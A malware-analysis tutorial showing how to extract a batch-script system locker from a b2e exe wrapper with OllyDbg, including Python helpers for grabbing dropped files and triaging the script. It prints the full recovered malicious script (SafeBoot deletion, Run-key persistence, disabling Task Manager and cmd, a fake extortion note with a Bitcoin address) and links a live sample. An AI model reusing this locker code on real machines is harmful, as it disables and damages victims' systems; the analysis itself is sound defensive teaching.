Unwrapping Exe Converters

Sample

Please download the following sample.
Win32.b1t.zip
Caution! This is live malware! The password is "infected" without quotes.
Introduction to Wrappers

This tutorial will show you how to unwrap a wrapped file using OllyDbg. Wrapped files carry a script or executable in their body, which they drop and run upon execution. Typically wrappers create exe files from, e.g., batch scripts, Python scripts, jar files or AutoIt scripts. They are a very mild form of obfuscation: the wrapped script or executable is most of the time encoded or encrypted within the resulting file, but it has to be decoded and written to disk before it can run, so it can be recovered at runtime.
Wrapped files often use the TEMP folder to drop the file, execute the dropped file, and then delete it. The biggest difficulty is that the dropped file usually gets deleted before you can copy it. Simple ways of circumventing this are listed below. In this case we will use OllyDbg to obtain the dropped file.
Method 1: Change the folder permissions

- Right-click the folder, click on Properties
- Click on the Security tab
- If the Security tab is not there, go to the folder options and uncheck "Use simple file sharing"
- In the Security tab click Add...
- Enter Everyone into the object name box, click OK
- Click on Advanced. Select Everyone, then click on the Edit button
- Place a checkmark in the Deny column for "Delete" and "Delete subfolders and files"
- Click OK until all windows are closed.
Note: Sometimes this will not work, because a wrapper may create a temp file to unpack into, then delete that temp file and create a folder of the same name.
Method 2: Use a file copy script

Save the following batch file, replace <filename> with the actual name of the temp file, and run the script prior to executing the sample. This will only work if you know the name of the temp file beforehand. If the sample uses a random name, you need another method to obtain the file.
@echo off
rem Keep trying to copy the temp file; most iterations fail until the wrapper drops it.
:loop
copy /y %TEMP%\<filename> . > nul 2>&1
goto loop
Method 3: Use a debugger

With a debugger like OllyDbg, break at a point where all files have been created but not yet deleted and copy them.
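The following is an added example, not part of the original tutorial: a polling file grabber that removes the main limitation of Method 2. Instead of copying one known filename in a loop, it snapshots a directory (assumed to be %TEMP%, or whatever you pass as the first argument) and copies every file that has appeared or changed since the last poll into a quarantine folder (assumed to be a "grabbed" folder under TEMP unless given as the second argument), so the dropped file's name does not have to be known in advance. It is still a race against the wrapper's delete, just like the batch loop; the debugger method remains the deterministic one.

```python
# Added example, not from the original tutorial: snapshot-based grabber for
# files that a wrapper drops into a directory and deletes again shortly after.
import os
import shutil
import sys
import time


def snapshot(root):
    """Return {path: size} for every regular file below root (recursive)."""
    seen = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                seen[path] = os.path.getsize(path)
            except OSError:
                continue  # file vanished between listing and stat
    return seen


def grab_new_files(root, quarantine, previous):
    """Copy files that are new (or changed size) since `previous` into quarantine.

    Returns (copied_paths, new_snapshot). Copies are named after the relative
    path with separators replaced, so same-named files in different random
    subfolders do not overwrite each other.
    """
    current = snapshot(root)
    quarantine_abs = os.path.abspath(quarantine)
    copied = []
    os.makedirs(quarantine, exist_ok=True)
    for path, size in current.items():
        if os.path.abspath(path).startswith(quarantine_abs + os.sep):
            continue  # never re-grab our own copies
        if previous.get(path) == size:
            continue  # unchanged since last poll
        rel = os.path.relpath(path, root).replace(os.sep, "__")
        dest = os.path.join(quarantine, rel)
        try:
            shutil.copy2(path, dest)  # copy while the wrapper still has it
            copied.append(dest)
        except OSError:
            pass  # sharing violation or already deleted; retry next poll
    return copied, current


def watch(root, quarantine, interval=0.005):
    """Poll until interrupted (Ctrl+C), printing each captured file."""
    previous = snapshot(root)
    while True:
        copied, previous = grab_new_files(root, quarantine, previous)
        for dest in copied:
            print("captured:", dest)
        time.sleep(interval)


if __name__ == "__main__":
    # Defaults are assumptions: the current user's TEMP, quarantine below it.
    temp = os.environ.get("TEMP", "/tmp")
    root = sys.argv[1] if len(sys.argv) > 1 else temp
    quarantine = sys.argv[2] if len(sys.argv) > 2 else os.path.join(temp, "grabbed")
    watch(root, quarantine)
```

Start it before running the sample and stop it with Ctrl+C once the wrapper has run; the quarantine folder then holds everything that briefly existed under TEMP, including files created in randomly named subfolders.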
Analysis

Take a look at the executable with a hex editor first. Two things might tell you that this is a wrapped file.
1. Antivirus detections name BAT as the platform.
2. Plaintext in the executable hints at the use of a b2e (batch to exe) converter.
That plaintext part looks as follows:
Overwrite? An unknown error occured. The program will be terminated. \ B D F I b2eincfilepath N O P S X open b2eargs Continue? extd b2etempfile b2eincfile @shift /0 Password Choose a location to save the files. -b2epass b2eprogramshortname Please enter the password. Error! b2eincfilecount The file
This program is not supported on your operating system. b2eprogramfilename Can not create some of your include files. b2eprogramname @call:extd Can not allocate the memory. OK b2eprogrampathname b2eextd Wrong password. extd.exe
already exists in the current directory. Overwrite? ÿÿÿÿ ÿÿÿÿ ÿÿÿÿ:extd
@set result=
@%b2eextd% "%~1" "%~2" "%~3" "%~4" "%~5" "%~6" "%~7" "%~8" "%~9" > "%b2etempfile%"
@set /p result= < "%b2etempfile%"
@del "%b2etempfile%"
@goto:eof
Although this is some batch code, it is not the batch script that we want. It is a helper routine that the converter embeds in every output: the :extd subroutine runs the external helper in %b2eextd% with up to nine arguments, redirects its output to %b2etempfile%, reads the first line back into %result% and deletes the temp file again.
It is time to run the sample in your lab. You will soon realize that the Windows Explorer disappears, the desktop is no longer functional, and any attempt to open Task Manager or the command prompt fails.
If you restart the machine, you will have the same situation after logging in. This would be typical behaviour for a system locker, but there is no ransom message. It also makes attempts to obtain the batch script more difficult. If you still have Process Explorer open, you will be able to kill the process that terminates explorer.exe. You will also be able to observe that a batch file was created in a randomly named subfolder in TEMP. But the batch file is gone soon after execution.
Unwrapping

Now start on a fresh VM and open the sample in OllyDbg. Create a snapshot before you start debugging. Olly will break as usual at the entry point of the executable.
Now think about it: What does the sample do before it runs the batch file?
It will write the file to TEMP. So we can set a breakpoint on WriteFile (e.g. Ctrl+G, enter WriteFile, then F2 on the first instruction) to halt before the TEMP file is written. Do that and press F9 to proceed with execution. If the breakpoint never hits, the sample may be calling NtWriteFile in ntdll directly; break there instead.
OllyDbg will break in this area within kernel32
Take a look at the registers. You can clearly see that a reference to the batch string is in the EDX register. Do not rely on that register alone: WriteFile takes its arguments on the stack, so at the function entry [ESP+8] is lpBuffer and [ESP+0C] is nNumberOfBytesToWrite, which also tells you the exact length of the script.
Right-click on the address and follow in dump.
The batch string will appear in the dump window and it seems to be complete.
This is a good point in time to create a dump of the process. I used ProcessExplorer in this case.
Now open the dumped memory in a hex editor and search for the beginning of the batch file, e.g., I searched for echo off in ASCII.
Copy and paste the batch file string into a new file. Et voilà, you have the complete batch script! Note that in this sample the first line, @shift /0, precedes @echo off, so a search for "echo off" lands one line into the script; scroll back to the start of the string so you do not lose it. The most interesting part comes now. Open the script in a text editor like Notepad++ and analyse the code.
@shift /0
@echo off
color c
taskkill /im explorer.exe /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
copy %0 C:\Windows\Win32.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
cls
title Windows blocked, file encrypt
echo Windows Blocked!
echo Hello, we inform you that your system
has been blocked and all the files are
encrypted for viewing child porn.
You can unlock the system,
for this you need to pay 0.5 BTC ¦ 1G2GAivmaBkTephZsorQsyGFNNdBs3bWMB
in the wallet Bitcoin application is written in your email address to which you will
be sent the code to unlock it.
echo Enter C0d3:
:upo
set /p x=
if %x%==123456789 (echo Windows start!
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
) ELSE (
cls
echo ERROR!
echo Enter C0d3:
)
goto upo
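As an added example (not part of the original tutorial), the following script automates the dump search described above. It looks for "echo off" in a raw process dump, then widens the hit backwards and forwards over printable bytes, so a leading line such as "@shift /0" is kept and the run ends at the first non-printable byte (the NUL terminator in this sample). The dump bytes embedded below are constructed for the demo; they are not taken from the real process.

```python
# Added example, not from the original tutorial: carve a dropped batch script
# out of a raw process memory dump, the way the tutorial does by hand.
import re
import sys

PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def normalize_newlines(text: str) -> str:
    """Wrappers may write CRLF or LF; normalise so duplicates compare equal."""
    return text.replace("\r\n", "\n").replace("\r", "\n")


def carve_scripts(dump: bytes, marker: bytes = b"echo off") -> list:
    """Return each distinct printable text run in dump that contains marker."""
    found = []
    for m in re.finditer(re.escape(marker), dump, re.IGNORECASE):
        start = m.start()
        while start > 0 and dump[start - 1] in PRINTABLE:
            start -= 1  # walk back over "@shift /0" and anything before it
        end = m.end()
        while end < len(dump) and dump[end] in PRINTABLE:
            end += 1    # walk forward to the first non-printable byte
        text = normalize_newlines(dump[start:end].decode("ascii"))
        if text not in found:  # the same script often sits in memory twice
            found.append(text)
    return found


def carve_file(path: str) -> list:
    with open(path, "rb") as fh:
        return carve_scripts(fh.read())


# Constructed demo dump: header junk, the script once with CRLF, a converter
# string, then the same script again with LF line endings.
SAMPLE_SCRIPT = ("@shift /0\r\n@echo off\r\ncolor c\r\n"
                 "taskkill /im explorer.exe /f > nul\r\n")
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\xff" * 8
    + SAMPLE_SCRIPT.encode("ascii") + b"\x00\x00"
    + b"b2etempfile\x00"
    + normalize_newlines(SAMPLE_SCRIPT).encode("ascii") + b"\x00"
)

if __name__ == "__main__":
    dump = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for i, script in enumerate(carve_scripts(dump)):
        print(f"--- candidate {i} ---")
        print(script)
```

Run it with the path of your process dump as the only argument. If the carved candidate starts with text that clearly belongs to the converter rather than to the script (printable strings stored directly in front of it), trim it at the "@shift" or "@echo off" line by hand.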
This looks like a complete fail, doesn't it?
It is indeed system locker ransomware, but there will never be a ransom note, because the command prompt is disabled and the ransom message is only shown in the command prompt!
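As an added example (not part of the original tutorial), here is a small triage helper for a recovered batch script of this kind. It pulls out the registry writes ("reg add"), registry deletes ("reg delete"), the file copied for persistence and the processes killed, and it flags "reg" lines whose syntax it cannot parse (for instance a missing space before /t) for manual review, since reg.exe will reject them as well. The script text embedded below is a constructed excerpt that mirrors the shape of the recovered file, not a copy of the malware.

```python
# Added example, not from the original tutorial: extract registry changes,
# persistence and killed processes from a recovered batch script.
import re

REG_ADD = re.compile(
    r'^\s*reg\s+add\s+"?(?P<key>[^"\s]+)"?\s+/v\s+(?P<name>\S+)'
    r'\s+/t\s+(?P<type>\S+)\s+/d\s+(?P<data>\S+)', re.IGNORECASE)
REG_DEL = re.compile(r'^\s*reg\s+delete\s+"?(?P<key>[^"\s]+)"?', re.IGNORECASE)
COPY = re.compile(r'^\s*copy\s+(?P<src>\S+)\s+(?P<dst>\S+)', re.IGNORECASE)
TASKKILL = re.compile(r'^\s*taskkill\s+.*?/im\s+(?P<image>\S+)', re.IGNORECASE)


def triage(script: str) -> dict:
    """Summarise what a batch script changes on the system."""
    result = {"reg_add": [], "reg_delete": [], "copies": [],
              "killed": [], "unparsed_reg": []}
    for raw in script.splitlines():
        line = raw.strip()
        if line.startswith("@"):
            line = line[1:]  # "@" only suppresses echoing of the command
        if not line:
            continue
        m = REG_ADD.match(line)
        if m:
            result["reg_add"].append(
                (m["key"], m["name"], m["type"].upper(), m["data"]))
            continue
        m = REG_DEL.match(line)
        if m:
            result["reg_delete"].append(m["key"])
            continue
        if line.lower().startswith("reg "):
            result["unparsed_reg"].append(line)  # malformed: check by hand
            continue
        m = COPY.match(line)
        if m:
            result["copies"].append((m["src"], m["dst"]))
            continue
        m = TASKKILL.match(line)
        if m:
            result["killed"].append(m["image"])
    # Anything written under a ...\Run key is logon persistence.
    result["persistence"] = [data for key, _n, _t, data in result["reg_add"]
                             if "\\run" in key.lower()]
    return result


# Constructed excerpt in the shape of the recovered script (not the malware).
SAMPLE = r"""@shift /0
@echo off
taskkill /im explorer.exe /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
copy %0 C:\Windows\Win32.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
"""

if __name__ == "__main__":
    for section, items in triage(SAMPLE).items():
        print(section)
        for item in items:
            print("   ", item)
```

The output separates the policy values that have to be reset from the Run entry and the dropped copy that have to be removed, and the unparsed line shows which of the script's own commands would have failed in the first place.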
Your task: Imagine a friend of yours got his or her system infected by this system locker. How would you be able to restore the system?